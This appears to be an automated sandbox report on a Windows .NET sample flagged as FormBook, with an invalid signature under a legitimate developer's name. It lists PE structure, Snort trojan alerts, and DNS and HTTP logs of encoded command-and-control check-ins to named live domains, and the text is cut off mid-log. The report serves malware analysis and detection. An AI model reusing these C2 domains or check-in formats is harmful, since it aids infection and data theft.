OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa17c5	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa2000	0x694	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa0600	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9ecd0	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9f820	0x9fa00	c17cd0f8b920b2243cd90c3b6e741ddb	False	0.8902854590837901	data	7.867960942113154	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa2000	0x694	0x800	5015f6754e6dc7ecdca5a6d89c036674	False	0.365234375	data	3.620445311636986	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa4000	0xc	0x200	6fd961939459872880198483276cd9c5	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xa2090	0x404	data			0.4270428015564202
RT_MANIFEST	0xa24a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/08/24-15:23:24.247871	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49718	80	192.168.2.9	104.21.56.10
04/08/24-15:25:48.239107	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49722	80	192.168.2.9	66.147.240.91
04/08/24-15:26:08.604254	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49723	80	192.168.2.9	172.67.154.171
04/08/24-15:25:06.359757	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49721	80	192.168.2.9	13.248.169.48
04/08/24-15:23:02.817331	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49716	80	192.168.2.9	13.248.169.48
04/08/24-15:24:04.974063	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49719	80	192.168.2.9	102.134.40.151
04/08/24-15:24:45.933979	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49720	80	192.168.2.9	3.33.130.190

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2024 15:23:02.693640947 CEST	49716	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:23:02.817167997 CEST	80	49716	13.248.169.48	192.168.2.9
Apr 8, 2024 15:23:02.817253113 CEST	49716	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:23:02.817331076 CEST	49716	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:23:02.940999985 CEST	80	49716	13.248.169.48	192.168.2.9
Apr 8, 2024 15:23:02.970737934 CEST	80	49716	13.248.169.48	192.168.2.9
Apr 8, 2024 15:23:02.970765114 CEST	80	49716	13.248.169.48	192.168.2.9
Apr 8, 2024 15:23:02.970871925 CEST	49716	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:23:02.970911026 CEST	49716	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:23:02.978147984 CEST	80	49716	13.248.169.48	192.168.2.9
Apr 8, 2024 15:23:02.978224993 CEST	49716	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:23:03.094393969 CEST	80	49716	13.248.169.48	192.168.2.9
Apr 8, 2024 15:23:23.117963076 CEST	49718	80	192.168.2.9	104.21.56.10
Apr 8, 2024 15:23:24.120999098 CEST	49718	80	192.168.2.9	104.21.56.10
Apr 8, 2024 15:23:24.247587919 CEST	80	49718	104.21.56.10	192.168.2.9
Apr 8, 2024 15:23:24.247720957 CEST	49718	80	192.168.2.9	104.21.56.10
Apr 8, 2024 15:23:24.247870922 CEST	49718	80	192.168.2.9	104.21.56.10
Apr 8, 2024 15:23:24.374821901 CEST	80	49718	104.21.56.10	192.168.2.9
Apr 8, 2024 15:23:24.621198893 CEST	80	49718	104.21.56.10	192.168.2.9
Apr 8, 2024 15:23:24.621220112 CEST	80	49718	104.21.56.10	192.168.2.9
Apr 8, 2024 15:23:24.621331930 CEST	80	49718	104.21.56.10	192.168.2.9
Apr 8, 2024 15:23:24.621340990 CEST	49718	80	192.168.2.9	104.21.56.10
Apr 8, 2024 15:23:24.621387959 CEST	49718	80	192.168.2.9	104.21.56.10
Apr 8, 2024 15:23:24.621407032 CEST	49718	80	192.168.2.9	104.21.56.10
Apr 8, 2024 15:24:04.785628080 CEST	49719	80	192.168.2.9	102.134.40.151
Apr 8, 2024 15:24:04.973695993 CEST	80	49719	102.134.40.151	192.168.2.9
Apr 8, 2024 15:24:04.973923922 CEST	49719	80	192.168.2.9	102.134.40.151
Apr 8, 2024 15:24:04.974062920 CEST	49719	80	192.168.2.9	102.134.40.151
Apr 8, 2024 15:24:05.162919044 CEST	80	49719	102.134.40.151	192.168.2.9
Apr 8, 2024 15:24:05.163193941 CEST	80	49719	102.134.40.151	192.168.2.9
Apr 8, 2024 15:24:05.163641930 CEST	49719	80	192.168.2.9	102.134.40.151
Apr 8, 2024 15:24:05.163641930 CEST	49719	80	192.168.2.9	102.134.40.151
Apr 8, 2024 15:24:05.351584911 CEST	80	49719	102.134.40.151	192.168.2.9
Apr 8, 2024 15:24:45.809750080 CEST	49720	80	192.168.2.9	3.33.130.190
Apr 8, 2024 15:24:45.933764935 CEST	80	49720	3.33.130.190	192.168.2.9
Apr 8, 2024 15:24:45.933856964 CEST	49720	80	192.168.2.9	3.33.130.190
Apr 8, 2024 15:24:45.933979034 CEST	49720	80	192.168.2.9	3.33.130.190
Apr 8, 2024 15:24:46.057802916 CEST	80	49720	3.33.130.190	192.168.2.9
Apr 8, 2024 15:24:46.087852001 CEST	80	49720	3.33.130.190	192.168.2.9
Apr 8, 2024 15:24:46.087894917 CEST	80	49720	3.33.130.190	192.168.2.9
Apr 8, 2024 15:24:46.087987900 CEST	49720	80	192.168.2.9	3.33.130.190
Apr 8, 2024 15:24:46.088051081 CEST	49720	80	192.168.2.9	3.33.130.190
Apr 8, 2024 15:24:46.092472076 CEST	80	49720	3.33.130.190	192.168.2.9
Apr 8, 2024 15:24:46.092540979 CEST	49720	80	192.168.2.9	3.33.130.190
Apr 8, 2024 15:24:46.215420961 CEST	80	49720	3.33.130.190	192.168.2.9
Apr 8, 2024 15:25:06.235718012 CEST	49721	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:25:06.359541893 CEST	80	49721	13.248.169.48	192.168.2.9
Apr 8, 2024 15:25:06.359637976 CEST	49721	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:25:06.359756947 CEST	49721	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:25:06.483475924 CEST	80	49721	13.248.169.48	192.168.2.9
Apr 8, 2024 15:25:06.509553909 CEST	80	49721	13.248.169.48	192.168.2.9
Apr 8, 2024 15:25:06.509571075 CEST	80	49721	13.248.169.48	192.168.2.9
Apr 8, 2024 15:25:06.509697914 CEST	49721	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:25:06.509738922 CEST	49721	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:25:06.516792059 CEST	80	49721	13.248.169.48	192.168.2.9
Apr 8, 2024 15:25:06.516880989 CEST	49721	80	192.168.2.9	13.248.169.48
Apr 8, 2024 15:25:06.633487940 CEST	80	49721	13.248.169.48	192.168.2.9
Apr 8, 2024 15:25:48.043667078 CEST	49722	80	192.168.2.9	66.147.240.91
Apr 8, 2024 15:25:48.238926888 CEST	80	49722	66.147.240.91	192.168.2.9
Apr 8, 2024 15:25:48.239022970 CEST	49722	80	192.168.2.9	66.147.240.91
Apr 8, 2024 15:25:48.239106894 CEST	49722	80	192.168.2.9	66.147.240.91
Apr 8, 2024 15:25:48.434309959 CEST	80	49722	66.147.240.91	192.168.2.9
Apr 8, 2024 15:25:48.442342043 CEST	80	49722	66.147.240.91	192.168.2.9
Apr 8, 2024 15:25:48.442388058 CEST	80	49722	66.147.240.91	192.168.2.9
Apr 8, 2024 15:25:48.442498922 CEST	49722	80	192.168.2.9	66.147.240.91
Apr 8, 2024 15:25:48.442498922 CEST	49722	80	192.168.2.9	66.147.240.91
Apr 8, 2024 15:25:48.637763023 CEST	80	49722	66.147.240.91	192.168.2.9
Apr 8, 2024 15:26:08.479686022 CEST	49723	80	192.168.2.9	172.67.154.171
Apr 8, 2024 15:26:08.603954077 CEST	80	49723	172.67.154.171	192.168.2.9
Apr 8, 2024 15:26:08.604023933 CEST	49723	80	192.168.2.9	172.67.154.171
Apr 8, 2024 15:26:08.604254007 CEST	49723	80	192.168.2.9	172.67.154.171
Apr 8, 2024 15:26:08.728358984 CEST	80	49723	172.67.154.171	192.168.2.9
Apr 8, 2024 15:26:09.253618956 CEST	80	49723	172.67.154.171	192.168.2.9
Apr 8, 2024 15:26:09.254127979 CEST	80	49723	172.67.154.171	192.168.2.9
Apr 8, 2024 15:26:09.259459019 CEST	49723	80	192.168.2.9	172.67.154.171
Apr 8, 2024 15:26:10.103084087 CEST	49723	80	192.168.2.9	172.67.154.171

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2024 15:23:02.560512066 CEST	52734	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:23:02.692785025 CEST	53	52734	1.1.1.1	192.168.2.9
Apr 8, 2024 15:23:22.981045008 CEST	50300	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:23:23.117042065 CEST	53	50300	1.1.1.1	192.168.2.9
Apr 8, 2024 15:23:43.184411049 CEST	52315	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:23:43.342160940 CEST	53	52315	1.1.1.1	192.168.2.9
Apr 8, 2024 15:24:04.341629982 CEST	57081	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:24:04.784672976 CEST	53	57081	1.1.1.1	192.168.2.9
Apr 8, 2024 15:24:24.937551975 CEST	58083	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:24:25.065148115 CEST	53	58083	1.1.1.1	192.168.2.9
Apr 8, 2024 15:24:45.515527964 CEST	51574	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:24:45.805449009 CEST	53	51574	1.1.1.1	192.168.2.9
Apr 8, 2024 15:25:06.105315924 CEST	61511	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:25:06.234658957 CEST	53	61511	1.1.1.1	192.168.2.9
Apr 8, 2024 15:25:26.861522913 CEST	52317	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:25:27.020524025 CEST	53	52317	1.1.1.1	192.168.2.9
Apr 8, 2024 15:25:47.727428913 CEST	61910	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:25:48.042604923 CEST	53	61910	1.1.1.1	192.168.2.9
Apr 8, 2024 15:26:08.307924032 CEST	57576	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:26:08.472210884 CEST	53	57576	1.1.1.1	192.168.2.9
Apr 8, 2024 15:26:29.061269999 CEST	63557	53	192.168.2.9	1.1.1.1
Apr 8, 2024 15:26:29.909606934 CEST	53	63557	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 8, 2024 15:23:02.560512066 CEST	192.168.2.9	1.1.1.1	0x1b5b	Standard query (0)	www.kidscircle.shop	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:23:22.981045008 CEST	192.168.2.9	1.1.1.1	0x663c	Standard query (0)	www.bombslot-42.co	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:23:43.184411049 CEST	192.168.2.9	1.1.1.1	0x9a9	Standard query (0)	www.erabits.com	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:24:04.341629982 CEST	192.168.2.9	1.1.1.1	0x2e84	Standard query (0)	www.mingshengglass.com	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:24:24.937551975 CEST	192.168.2.9	1.1.1.1	0xefba	Standard query (0)	www.yoursweets.online	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:24:45.515527964 CEST	192.168.2.9	1.1.1.1	0x9e40	Standard query (0)	www.ethicai.pro	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:25:06.105315924 CEST	192.168.2.9	1.1.1.1	0x9671	Standard query (0)	www.owletbaby.shop	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:25:26.861522913 CEST	192.168.2.9	1.1.1.1	0xc00f	Standard query (0)	www.mayorii.com	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:25:47.727428913 CEST	192.168.2.9	1.1.1.1	0x2569	Standard query (0)	www.oregonjobs.co	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:26:08.307924032 CEST	192.168.2.9	1.1.1.1	0x283b	Standard query (0)	www.helyibudapest.com	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:26:29.061269999 CEST	192.168.2.9	1.1.1.1	0xbab1	Standard query (0)	www.poseidoncrm.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 8, 2024 15:23:02.692785025 CEST	1.1.1.1	192.168.2.9	0x1b5b	No error (0)	www.kidscircle.shop		13.248.169.48	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:23:02.692785025 CEST	1.1.1.1	192.168.2.9	0x1b5b	No error (0)	www.kidscircle.shop		76.223.54.146	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:23:23.117042065 CEST	1.1.1.1	192.168.2.9	0x663c	No error (0)	www.bombslot-42.co		104.21.56.10	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:23:23.117042065 CEST	1.1.1.1	192.168.2.9	0x663c	No error (0)	www.bombslot-42.co		172.67.175.171	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:23:43.342160940 CEST	1.1.1.1	192.168.2.9	0x9a9	Name error (3)	www.erabits.com	none	none	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:24:04.784672976 CEST	1.1.1.1	192.168.2.9	0x2e84	No error (0)	www.mingshengglass.com		102.134.40.151	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:24:25.065148115 CEST	1.1.1.1	192.168.2.9	0xefba	Name error (3)	www.yoursweets.online	none	none	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:24:45.805449009 CEST	1.1.1.1	192.168.2.9	0x9e40	No error (0)	www.ethicai.pro	ethicai.pro		CNAME (Canonical name)	IN (0x0001)	false
Apr 8, 2024 15:24:45.805449009 CEST	1.1.1.1	192.168.2.9	0x9e40	No error (0)	ethicai.pro		3.33.130.190	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:24:45.805449009 CEST	1.1.1.1	192.168.2.9	0x9e40	No error (0)	ethicai.pro		15.197.148.33	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:25:06.234658957 CEST	1.1.1.1	192.168.2.9	0x9671	No error (0)	www.owletbaby.shop		13.248.169.48	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:25:06.234658957 CEST	1.1.1.1	192.168.2.9	0x9671	No error (0)	www.owletbaby.shop		76.223.54.146	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:25:27.020524025 CEST	1.1.1.1	192.168.2.9	0xc00f	Name error (3)	www.mayorii.com	none	none	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:25:48.042604923 CEST	1.1.1.1	192.168.2.9	0x2569	No error (0)	www.oregonjobs.co	oregonjobs.co		CNAME (Canonical name)	IN (0x0001)	false
Apr 8, 2024 15:25:48.042604923 CEST	1.1.1.1	192.168.2.9	0x2569	No error (0)	oregonjobs.co		66.147.240.91	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:26:08.472210884 CEST	1.1.1.1	192.168.2.9	0x283b	No error (0)	www.helyibudapest.com		172.67.154.171	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:26:08.472210884 CEST	1.1.1.1	192.168.2.9	0x283b	No error (0)	www.helyibudapest.com		104.21.5.190	A (IP address)	IN (0x0001)	false
Apr 8, 2024 15:26:29.909606934 CEST	1.1.1.1	192.168.2.9	0xbab1	Server failure (2)	www.poseidoncrm.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.kidscircle.shop

www.bombslot-42.co

www.mingshengglass.com

www.ethicai.pro

www.owletbaby.shop

www.oregonjobs.co

www.helyibudapest.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49716	13.248.169.48	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 15:23:02.817331076 CEST	171	OUT	GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=PLKcE8xpvhyOzOxKkeL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pz+4M+mlciA/ HTTP/1.1 Host: www.kidscircle.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2024 15:23:02.970737934 CEST	349	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 08 Apr 2024 13:23:02 GMT Content-Type: text/html Content-Length: 209 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 32 4d 3d 4e 6a 4f 68 41 48 7a 48 35 4c 78 54 43 4e 72 50 26 75 54 6d 34 3d 50 4c 4b 63 45 38 78 70 76 68 79 4f 7a 4f 78 4b 6b 65 4c 2f 2b 44 4c 31 6b 4e 49 63 71 33 39 49 49 59 6e 50 38 4f 4f 33 58 58 6a 6c 36 63 69 35 72 58 6d 41 43 78 77 2f 70 7a 2b 34 4d 2b 6d 6c 63 69 41 2f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R2M=NjOhAHzH5LxTCNrP&uTm4=PLKcE8xpvhyOzOxKkeL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pz+4M+mlciA/"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49718	104.21.56.10	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 15:23:24.247870922 CEST	170	OUT	GET /vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrP HTTP/1.1 Host: www.bombslot-42.co Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2024 15:23:24.621198893 CEST	755	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Apr 2024 13:23:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sj4kR%2FWxTqizZeKzuOtgPoR4qc%2B9UsS9LTHntpDXGYTM7Cf0swEcQjz%2Bf2zU0AMtmKZwgXJYXOfOZdLKBnp6XNrdXPfiUV2l9vKbqirlHETdLc4yuJcepmISOk%2BwVr13SUhP8u8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8712925ce9d2a534-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Apr 8, 2024 15:23:24.621220112 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49719	102.134.40.151	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 15:24:04.974062920 CEST	174	OUT	GET /vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrP HTTP/1.1 Host: www.mingshengglass.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49720	3.33.130.190	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 15:24:45.933979034 CEST	167	OUT	GET /vr01/?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP HTTP/1.1 Host: www.ethicai.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2024 15:24:46.087852001 CEST	349	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 08 Apr 2024 13:24:46 GMT Content-Type: text/html Content-Length: 209 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 75 54 6d 34 3d 6d 64 37 59 77 61 49 59 46 55 6a 61 6a 41 52 50 38 48 37 41 41 35 71 6b 7a 55 34 55 36 53 74 2b 41 6a 57 71 74 63 47 42 76 6d 79 38 69 35 68 34 42 68 79 50 2f 63 44 37 4c 69 56 78 56 72 4f 78 79 66 61 2b 26 52 32 4d 3d 4e 6a 4f 68 41 48 7a 48 35 4c 78 54 43 4e 72 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49721	13.248.169.48	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 15:25:06.359756947 CEST	170	OUT	GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL HTTP/1.1 Host: www.owletbaby.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2024 15:25:06.509553909 CEST	349	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 08 Apr 2024 13:25:06 GMT Content-Type: text/html Content-Length: 209 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 32 4d 3d 4e 6a 4f 68 41 48 7a 48 35 4c 78 54 43 4e 72 50 26 75 54 6d 34 3d 6f 6d 2b 52 41 6a 38 2b 31 55 30 5a 34 51 35 72 6b 6b 38 62 33 4d 39 4a 52 47 55 4a 32 65 75 50 36 66 30 37 4f 50 51 56 66 7a 6b 32 41 2f 45 54 2f 75 71 52 41 47 54 68 75 53 39 49 78 7a 6e 5a 73 2b 51 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 